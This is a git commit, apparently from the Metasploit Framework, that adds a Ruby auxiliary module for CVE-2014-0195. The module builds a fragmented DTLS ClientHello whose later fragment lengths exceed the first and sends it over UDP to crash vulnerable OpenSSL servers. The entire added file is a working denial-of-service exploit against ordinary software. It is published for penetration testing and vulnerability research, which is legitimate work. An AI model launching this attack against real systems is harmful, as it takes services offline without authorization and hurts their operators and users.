Land #3429, @jhart-r7's auxiliary module for CVE-2014-0195

2014-06-09 13:34:38 -05:00 · 2014-06-09 13:34:38 -05:00 · 0e611b5d64
parent 1f33566033 ed5d83a41b
commit 0e611b5d64
1 changed files with 80 additions and 0 deletions
--- a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb
+++ b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb
@ -0,0 +1,80 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Dos
+  include Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'		=> 'OpenSSL DTLS Fragment Buffer Overflow DoS',
+      'Description'	=> %q{
+        This module performs a Denial of Service Attack against Datagram TLS in
+        OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.
+        This occurs when a DTLS ClientHello message has multiple fragments and the
+        fragment lengths of later fragments are larger than that of the first, a
+        buffer overflow occurs, causing a DoS.
+      },
+      'Author'	=>
+        [
+          'Juri Aedla', # Vulnerability discovery
+          'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2014-0195'],
+          ['ZDI', '14-173'],
+          ['BID', '67900']
+        ],
+      'DisclosureDate' => 'Jun 05 2014'))
+
+    register_options([
+      Opt::RPORT(4433),
+      OptInt.new('VERSION', [true,  "SSl/TLS version", 0xFEFF])
+    ], self.class)
+
+  end
+
+  def build_tls_fragment(type, length, seq, frag_offset, frag_length, frag_body=nil)
+    # format is: type (1 byte), total length (3 bytes), sequence # (2 bytes),
+    # fragment offset (3 bytes), fragment length (3 bytes), fragment body
+    sol = (seq << 48) | (frag_offset << 24) | frag_length
+    [
+      (type << 24) | length,
+      (sol >> 32),
+      (sol & 0x00000000FFFFFFFF)
+    ].pack("NNN") + frag_body
+  end
+
+  def build_tls_message(type, version, epoch, sequence, message)
+    # format is: type (1 byte), version (2 bytes), epoch # (2 bytes),
+    # sequence # (6 bytes) + message length (2 bytes), message body
+    es = (epoch << 48) | sequence
+    [
+      type,
+      version,
+      (es >> 32),
+      (es & 0x00000000FFFFFFFF),
+      message.length
+    ].pack("CnNNn") + message
+  end
+
+  def run
+    # add a small fragment
+    fragments = build_tls_fragment(1, 2, 0, 0, 1, 'C')
+    # add a large fragment where the length is significantly larger than that of the first
+    # TODO: you'll need to tweak the 2nd, 5th and 6th arguments to trigger the condition in some situations
+    fragments << build_tls_fragment(1, 1234, 0, 0, 123, Rex::Text.rand_text_alpha(1234))
+    message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments)
+    connect_udp
+    print_status("Sending fragmented DTLS client hello packet to #{rhost}:#{rport}")
+    udp_sock.put(message)
+    disconnect_udp
+  end
+end